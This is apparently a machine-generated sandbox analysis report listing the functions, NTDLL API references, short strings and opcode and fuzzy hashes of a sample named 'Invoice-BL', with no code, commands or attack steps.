API String ID: 2492992576-1915349394
Opcode ID: 6a2ab73528d56497f537ee497d8fec60736fd8c797cf0efba9d947bfc55ad622
Instruction ID: 1f1b269a453af05dbf0e72e46ada349d256b2ba6b76cdb9a0f713c1a9abb89b3
Opcode Fuzzy Hash: 6a2ab73528d56497f537ee497d8fec60736fd8c797cf0efba9d947bfc55ad622
Instruction Fuzzy Hash: 0F2189B0808399CFCB14DFA9D8446EEBFF4FB09320F24859AD965A7291C7746944CFA1

Function 05B75320 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000050), ref: 05B753A3

Strings

4'qq, xrefs: 05B7535C

Memory Dump Source

Source File: 00000006.00000002.4130895242.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5b70000_Invoice-BL.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID: 4'qq
API String ID: 2492992576-1915349394
Opcode ID: 1ee5425c3835301b952b8f080dcb297593a92b694828718e1aab34cdd537ca55
Instruction ID: ff62764d28041fd763ca94c48e8e0b68d7d3186eaa9ba15c89d4164cc7de0874
Opcode Fuzzy Hash: 1ee5425c3835301b952b8f080dcb297593a92b694828718e1aab34cdd537ca55
Instruction Fuzzy Hash: E82134B580435ACFCB14DF99D8446EEBBF8FB48320F10855AD929B7280C7746944CFA5

Function 01316DA0 Relevance: 2.7, Strings: 2, Instructions: 234
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(uq, xrefs: 01316F20
(uq, xrefs: 01316EF4

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID: (uq$(uq
API String ID: 0-921299607
Opcode ID: 8d29c033268250d599e684f3de3cd0455cd1603d235d3b3d8b16a76c6d4bb72d
Instruction ID: f438f8c0de5784a241b68d437f3788246583b2490e506e5c3016d886c352ec85
Opcode Fuzzy Hash: 8d29c033268250d599e684f3de3cd0455cd1603d235d3b3d8b16a76c6d4bb72d
Instruction Fuzzy Hash: 6371E1717042104FCB19DF6DD89096EBBE6EFC525531485BAE909CF35ADE30EC4687A0

Function 013160FC Relevance: 2.7, Strings: 2, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vfm, xrefs: 01316177
\Vfm, xrefs: 013162CA

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID: \Vfm$\Vfm
API String ID: 0-1613071310
Opcode ID: 2bb0e8da9345a6b494b629dbb2a5bc28f9c414b323fc48d84f21b67556e43b21
Instruction ID: 4b38456962bbfe1b0648af5e9eb79811276924392a91ac4dce4aedc5285fa880
Opcode Fuzzy Hash: 2bb0e8da9345a6b494b629dbb2a5bc28f9c414b323fc48d84f21b67556e43b21
Instruction Fuzzy Hash: 96712CB0E00209CFDB18DFA9C8867DDBBF2AF88718F148529D455A7258DBB49846CF91

Function 01316108 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vfm, xrefs: 01316177
\Vfm, xrefs: 013162CA

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID: \Vfm$\Vfm
API String ID: 0-1613071310
Opcode ID: aa70611ef73e1c55fa67fa0aa7dd0d6efb4289b619428742bc5ce347e8121fdd
Instruction ID: 00fc3708b5905e24ab3f5031c670b02e1a330d1d4d484f99beb79ac88a4b9ffd
Opcode Fuzzy Hash: aa70611ef73e1c55fa67fa0aa7dd0d6efb4289b619428742bc5ce347e8121fdd
Instruction Fuzzy Hash: 31713DB0E002099FDF18DFE9C8857DEBBF2BF88718F148529D415A7258DBB49846CB91

Function 01311750 Relevance: 2.7, Strings: 2, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Teqq, xrefs: 01311785
(uq, xrefs: 01311A2A

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID: (uq$Teqq
API String ID: 0-438662583
Opcode ID: 9b56d009c11c30d3dc0a0452f506d78cafd5fe973b722473194953ff43f78e0e
Instruction ID: 8b107637254a449948139ee17a81d58c10acd9ef29ce91bc6fc29157334b3d9a
Opcode Fuzzy Hash: 9b56d009c11c30d3dc0a0452f506d78cafd5fe973b722473194953ff43f78e0e
Instruction Fuzzy Hash: 95616D31B141149FDB58DF78C454AADBBF2BF89710F25C1A9D506DB3A6DA71EC018B80

Function 01317020 Relevance: 2.6, Strings: 2, Instructions: 140
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Teqq, xrefs: 01317051
dLwq, xrefs: 0131709B

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID: Teqq$dLwq
API String ID: 0-1696898143
Opcode ID: fe5c6d9a4e24605d9d43ced64074c44d51c7ced0bfa145baf017eef69d0ad2c4
Instruction ID: e359d982867a25aa75610d345fa1b69923a2340fc2b02987b5ebd58c896df0ed
Opcode Fuzzy Hash: fe5c6d9a4e24605d9d43ced64074c44d51c7ced0bfa145baf017eef69d0ad2c4
Instruction Fuzzy Hash: 6251F374B101149FCB48DF69C498A9DBBF6FF89714B2540A9E506DB375DB71EC018B40

Function 013115B8 Relevance: 2.6, Strings: 2, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Huq, xrefs: 013116D8
dLwq, xrefs: 013115F3

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID: Huq$dLwq
API String ID: 0-3676094919
Opcode ID: 8fd45c27613e556815cc426db39e6f54a39ec738e017e2c4add351ed47fd23d7
Instruction ID: b4d62a607c471c81bcb673edd0da27cb1ecdd8b16c7f89e7531cd535e6b10f40
Opcode Fuzzy Hash: 8fd45c27613e556815cc426db39e6f54a39ec738e017e2c4add351ed47fd23d7
Instruction Fuzzy Hash: 0141D330B042049FCB19DB79C454AAEBBF2FF89314F1885A9E506EB365CA759C05CB91

Function 01318970 Relevance: 1.9, Strings: 1, Instructions: 666
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fvq, xrefs: 01318A53

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID: fvq
API String ID: 0-2471188586
Opcode ID: e0dbfd11c9c086070934d749cf046e2e580fdd7a72d536c99379c893ef7526a1
Instruction ID: df2241957d5d52111a43a1420227f4e632b9278051da11d2f4e618bcb2a17dfd
Opcode Fuzzy Hash: e0dbfd11c9c086070934d749cf046e2e580fdd7a72d536c99379c893ef7526a1
Instruction Fuzzy Hash: 1D520278A10329DFDF05EBA5D454BAE7BB3FB8C311F108514EA0523758CF396892EA25

Function 0131CB98 Relevance: 1.8, Strings: 1, Instructions: 531
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 0131CD78

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: e4fe5c454ebdc166f20e8d6c4e4ee69fcff3aabace1302e2d1721f519e8006ac
Instruction ID: 76a411957c550f0756fc6ef667acf4cfbdac1001af5d3ead83371d8ffc3a22ad
Opcode Fuzzy Hash: e4fe5c454ebdc166f20e8d6c4e4ee69fcff3aabace1302e2d1721f519e8006ac
Instruction Fuzzy Hash: FA324B71A00609DFDB19CFA9D888B9DFBF1FF49318F148619E4159B619D730E896CB80

Function 05B70B1E Relevance: 1.6, APIs: 1, Instructions: 66
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05B70B6C

Memory Dump Source

Source File: 00000006.00000002.4130895242.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5b70000_Invoice-BL.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e066ca8e168bf9ba4f2d296982557e2d0599c8c31ac187057fd954ae287f3f6c
Instruction ID: dce64c7d9000a071c0989f80db854501fcec1442223d85a76b41dfe18bda3470
Opcode Fuzzy Hash: e066ca8e168bf9ba4f2d296982557e2d0599c8c31ac187057fd954ae287f3f6c
Instruction Fuzzy Hash: 93214D357001198FCB58EB38C5587AE77F6EB8C745F200569E406A73A9DF75AD42CB80

Function 01315AB4 Relevance: 1.5, Strings: 1, Instructions: 278
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vfm, xrefs: 01315D77

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID: \Vfm
API String ID: 0-3356159168
Opcode ID: 0a963cca21dd2216ac21d9562d42297ab633ef935586caabcc57686a41b7f550
Instruction ID: 8e5063267d7e94e4ad13496cd616835609ffc516637743a3038aa4d022b19196
Opcode Fuzzy Hash: 0a963cca21dd2216ac21d9562d42297ab633ef935586caabcc57686a41b7f550
Instruction Fuzzy Hash: 07B13D70E002098FDF18CFA9C9857DDBBF2BF89718F148129D855A7298EB749845CF91

Function 05B70A6A Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05B70A89

Memory Dump Source

Source File: 00000006.00000002.4130895242.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5b70000_Invoice-BL.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a4b3e80d68710eeb1c818e88bb278e8bb3d157f1a1e479860424061734fcae25
Instruction ID: d5e5a467726ca333a7e78dfe19302cc3d73b0d0c05c8a9a0b7827306d1fdd1f3
Opcode Fuzzy Hash: a4b3e80d68710eeb1c818e88bb278e8bb3d157f1a1e479860424061734fcae25
Instruction Fuzzy Hash: D4E0393690192DDFCB21EB94E95CAACF331FB94312F018162C56653A04C73078A2CFC1

Function 05B70A7C Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05B70A89

Memory Dump Source

Source File: 00000006.00000002.4130895242.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5b70000_Invoice-BL.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 2c4ee6a47f0f4571851ae95ea770fa8c29c25a050d9c7432b378a9b2228fc782
Instruction ID: 445d8659c628d2d2b074a2bf920f76a04e0aef8374b149355d4075c0f4eea403
Opcode Fuzzy Hash: 2c4ee6a47f0f4571851ae95ea770fa8c29c25a050d9c7432b378a9b2228fc782
Instruction Fuzzy Hash: 25E09A7690192DDFCB15EB84F95C6A8B371FB84312F018166D56653944C7307892CF85

Function 01318651 Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

K, xrefs: 013187A7

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-2299363055
Opcode ID: c840f4a8d82571004b34db2fc84af1d997160f64492393dc761ab19787d54237
Instruction ID: bff3daa26b003821533fe97b0f6883145c855e0809568dc51912ad4fd25135ae
Opcode Fuzzy Hash: c840f4a8d82571004b34db2fc84af1d997160f64492393dc761ab19787d54237
Instruction Fuzzy Hash: 1451B574E0460A8FCB19DFA9C58059EB7B2FF98304F208A6DD416AB355DB30EC46CB84

Function 01311BD0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

LRqq, xrefs: 01311C23

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID: LRqq
API String ID: 0-2392378202
Opcode ID: 05f3b589809b944e8c9469b52c1719c258cea5e6b66d92daa2f492bc8e9aa72e
Instruction ID: dadbd5cc211e1ee1aad86259ae877df3c1dd9d4888cb5527a342247d963fd3eb
Opcode Fuzzy Hash: 05f3b589809b944e8c9469b52c1719c258cea5e6b66d92daa2f492bc8e9aa72e
Instruction Fuzzy Hash: 0231D470F142168FCB48EBB984909BEBBF6FF89310B144569E205DB3A5EE34DC428790

Function 013115A8 Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

dLwq, xrefs: 013115F3

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID: dLwq
API String ID: 0-2885444983
Opcode ID: 985091abd7d069fca0bab2cb3d70101ca66e8f005ffc1ce375a19034411a66fd
Instruction ID: acc1e49c7b1e7e2a2d6b0dbb6b77c1a0cec5d7bf76061278a3b84704733677fd
Opcode Fuzzy Hash: 985091abd7d069fca0bab2cb3d70101ca66e8f005ffc1ce375a19034411a66fd
Instruction Fuzzy Hash: 0031D070A002059FDB18DF68C488BEEBBF2FF88304F188569E502AB3A5CB759C45CB50

Function 01311DFD Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

lqvq, xrefs: 01311DA2

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID: lqvq
API String ID: 0-1541409306
Opcode ID: 1640d19882e6bd349050a67037d1dd7dcf315bb9421ad0dab5c09bd723f49734
Instruction ID: 8b2ec461575bebb3e9ee6f96df6717feb207c1785f65ab2be70af8fc17f933cf
Opcode Fuzzy Hash: 1640d19882e6bd349050a67037d1dd7dcf315bb9421ad0dab5c09bd723f49734
Instruction Fuzzy Hash: CE210230A143269FCF05EFB8D8506ECBBF6EF49202F804A6AD004EB669DF355946C791

Function 0131CA09 Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

&?A, xrefs: 0131CA36

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID: &?A
API String ID: 0-2592389242
Opcode ID: f064397926614c8ee3722980cd26d29e452477747b235fdba4fdcf98e62e6159
Instruction ID: ed9c188bb98d4c2b91c1df8b620501c15b3eb44cd8f0591c125c323763ba96ef
Opcode Fuzzy Hash: f064397926614c8ee3722980cd26d29e452477747b235fdba4fdcf98e62e6159
Instruction Fuzzy Hash: F511A1B1A003008FDB05DF64D8817997BE5FF94311F15C579E5489F29AEBB98C45CB60

Function 0131CA18 Relevance: 1.3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

Strings

&?A, xrefs: 0131CA36

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID: &?A
API String ID: 0-2592389242
Opcode ID: f31255b7600b207f151c303a4a9c05c2559fd23a000d3588d2b4f5d4be5bd9a9
Instruction ID: d7637bf82c881208ad144f8e4ece35a98ea4cee51dacb12cd6e91044e2df7903
Opcode Fuzzy Hash: f31255b7600b207f151c303a4a9c05c2559fd23a000d3588d2b4f5d4be5bd9a9
Instruction Fuzzy Hash: 44014CB1B003108FDB049F55E88575ABBA5FBD8311F108579E90C9F289DAB59845CBA0

Function 013116D7 Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

Huq, xrefs: 013116D8

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID: Huq
API String ID: 0-93357626
Opcode ID: 964c07fc370803e19f3fd8b3d918948ff0c80504a1c103269baed3fedeb5c0a0
Instruction ID: fcb176d44d69cb759ce1855af59d8ec4e25f12616a9ba355acb668c4e7f8a561
Opcode Fuzzy Hash: 964c07fc370803e19f3fd8b3d918948ff0c80504a1c103269baed3fedeb5c0a0
Instruction Fuzzy Hash: 1F01F93170C3900FC78A973D541456E7FE2AFC625036984EAD189CB357CD288C068791

Function 01311F3F Relevance: .8, Instructions: 788COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f73e6c4baf699ed5e10e362e2723d228003bdc0984f44ba76622cdab1a8c8418
Instruction ID: 628d65e0d234bbd2b90fd913f9a001544a509351fa4bb0a4c438fd9be914abc2
Opcode Fuzzy Hash: f73e6c4baf699ed5e10e362e2723d228003bdc0984f44ba76622cdab1a8c8418
Instruction Fuzzy Hash: 7B72CB709102188FDBA8DBA4C8647DEBBB6BF88301F1081A9D24E673A4DF345E95DF51

Function 01311F50 Relevance: .8, Instructions: 780COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b38028d648bbdd63a3461d3c231e1d396afd3d78437ba26b50a032ef455552c
Instruction ID: 4a095a9aa6a3f2d658aa2ace309744dab3d71a016c64d8eb1ea21f61da4439ee
Opcode Fuzzy Hash: 6b38028d648bbdd63a3461d3c231e1d396afd3d78437ba26b50a032ef455552c
Instruction Fuzzy Hash: E172CB709102188FDB98DBA4C8647DEBBB6BF88301F1081A9D24E673A4DF345E95DF51

Function 01316385 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e3a19b1ee7d4bff81402dc35086a18836966b3b47cf3c336313624b23541082
Instruction ID: 48f5cf9529326f737671fec2ff028eab2ac9381e3d61cd9fc5aa3f88b0148b77
Opcode Fuzzy Hash: 5e3a19b1ee7d4bff81402dc35086a18836966b3b47cf3c336313624b23541082
Instruction Fuzzy Hash: 2CB15FB0E00209CFDB18CFECD98679DBBF2AF48718F148529D815A7258EBB49845CB91

Function 0131AB38 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb8a81214cd5674ea1dc2e64d2721cc0b1b1b35f3fc73425b4e672c5c973c780
Instruction ID: 17ac661b13fcc942ced37010fb9aa621e619e01aee023f25d28aa3781b6b4f6e
Opcode Fuzzy Hash: fb8a81214cd5674ea1dc2e64d2721cc0b1b1b35f3fc73425b4e672c5c973c780
Instruction Fuzzy Hash: 0481C674F012698FCB05EF74D5A46AF7FB2AF88301F148599E4059B39AEB349C02CB95

Function 0131D598 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1349bc5515ebc5e6d367bfaa65c401dd4de7fac485748ad8a8ee043ccc9073e1
Instruction ID: 7869634d5e9c8442132cf4c8a40b8f55f9f3f8048be4b84ca77e55e70ea3ee88
Opcode Fuzzy Hash: 1349bc5515ebc5e6d367bfaa65c401dd4de7fac485748ad8a8ee043ccc9073e1
Instruction Fuzzy Hash: B561A270B002159FDB05DF78C444A6EBBF6BF89314F248569D419AB399DB31EC42CB90

Function 01317E29 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9940e4fda516b968d8ad9b77fc1ee201c21f263ed45dd9abc5958d5c7479e85c
Instruction ID: 50e26e112398b4ccd87624cae2d624bfc6f9fa53f15ef029ef26af6f8b80b707
Opcode Fuzzy Hash: 9940e4fda516b968d8ad9b77fc1ee201c21f263ed45dd9abc5958d5c7479e85c
Instruction Fuzzy Hash: D761BA34F1021ACFCB48EFB1F56857E7BB6AB886417508924E5169779CEF34AC029F80

Function 01317E38 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69baaebefe3c746097f0d081772b66dc996f023f652742a14d30b9cee0135425
Instruction ID: 9a69428b1fa24fd0fa16064c8aa762ceb749a860349d8cea3bdf06a66e42c046
Opcode Fuzzy Hash: 69baaebefe3c746097f0d081772b66dc996f023f652742a14d30b9cee0135425
Instruction Fuzzy Hash: BF619934F1021A8FCB48EFB1F56857F7BB6AB886417508924E5169779CEF34AC029F80

Function 0131AE40 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 912c91cad0239f252ddb09ca1459401c08a2b4722a9bb86167f5a4390d59403d
Instruction ID: 00f2ba65945e5ba1ca481667181f55ddcd014b41391209d4f230b9d716fcdd76
Opcode Fuzzy Hash: 912c91cad0239f252ddb09ca1459401c08a2b4722a9bb86167f5a4390d59403d
Instruction Fuzzy Hash: 1F516B74B10205CFCB05DF68D8959AEBBF6FB88315F108569E91ADB359DB31AC06CB40

Function 0131D2E0 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebdc63a4335e8946b37dbbffab9b8892fbc1344464075894b378f1891205e7ba
Instruction ID: 1de671a468541a9117e412434dc81db38998000d9235c1d7504ec2c5e0c2313f
Opcode Fuzzy Hash: ebdc63a4335e8946b37dbbffab9b8892fbc1344464075894b378f1891205e7ba
Instruction Fuzzy Hash: F251A231A105298BCB1DCF98C4846EDFBF6BF85318F598529D446BB64ACB34BC80CB90

Function 01317E68 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42e00b6b3da1a88ded074f5aa6606986f67432f368b5023116e2be50ae83aa09
Instruction ID: 4eb849d2540f19cff590df0c284a11910d737357c2d6ae1f6dae66711748deb9
Opcode Fuzzy Hash: 42e00b6b3da1a88ded074f5aa6606986f67432f368b5023116e2be50ae83aa09
Instruction Fuzzy Hash: 7851A438F1021ACBCB48EFB1F56857F7B72AB886417508924E5169779CEF34AC029F80

Function 0131EB1F Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b68bc7824ce0fe75073b351c4db55989f943595a5132117053cba6708f510ca9
Instruction ID: 322f303361f149e9e132dd0bb551fdb5950a6546f4c6ba8a95c08da44b2c2ef4
Opcode Fuzzy Hash: b68bc7824ce0fe75073b351c4db55989f943595a5132117053cba6708f510ca9
Instruction Fuzzy Hash: 60515F78F011198FCB49EF69D5546AEBBF2EBCC310B248165E809E7359EB359D02CB90

Function 01312F60 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9338fddcca8914417cd75f6d1cc8b8dce7ee4d1f25d9478615594f21ffc4da41
Instruction ID: b210fd4cbda093bf6a4bc48a657317f96afd2d4d1dc1c9cfad0f0438db61dfbf
Opcode Fuzzy Hash: 9338fddcca8914417cd75f6d1cc8b8dce7ee4d1f25d9478615594f21ffc4da41
Instruction Fuzzy Hash: B251BF74B102258FCB09AB79D454B6E7AF7AF8C711F108529E50AE7798DF389C428B90

Function 01317E85 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 468cda10eca411777b6886a3371c150885a6a89e626688912c6eaf6818cd8168
Instruction ID: f324b21123fbbd301da3270e1ae75daf26863fee06e0db1e5dcfb7c198474597
Opcode Fuzzy Hash: 468cda10eca411777b6886a3371c150885a6a89e626688912c6eaf6818cd8168
Instruction Fuzzy Hash: 08519538F1021A8BCB58EFB1F56857F7B72AB886417508924E5169779CEF34AC02DB84

Function 0131F058 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f19473cf3090aa697df021b58523ec675619786e997e504b981deee23b419de
Instruction ID: f3465263927a9222a7da74eac4f9656ae3b66e23bb9d81fac300f8fda100c804
Opcode Fuzzy Hash: 6f19473cf3090aa697df021b58523ec675619786e997e504b981deee23b419de
Instruction Fuzzy Hash: 13414035B002199FCB09DFA8D9909ADB7B6FF88304F108565D909AF349DB71AD06CB90

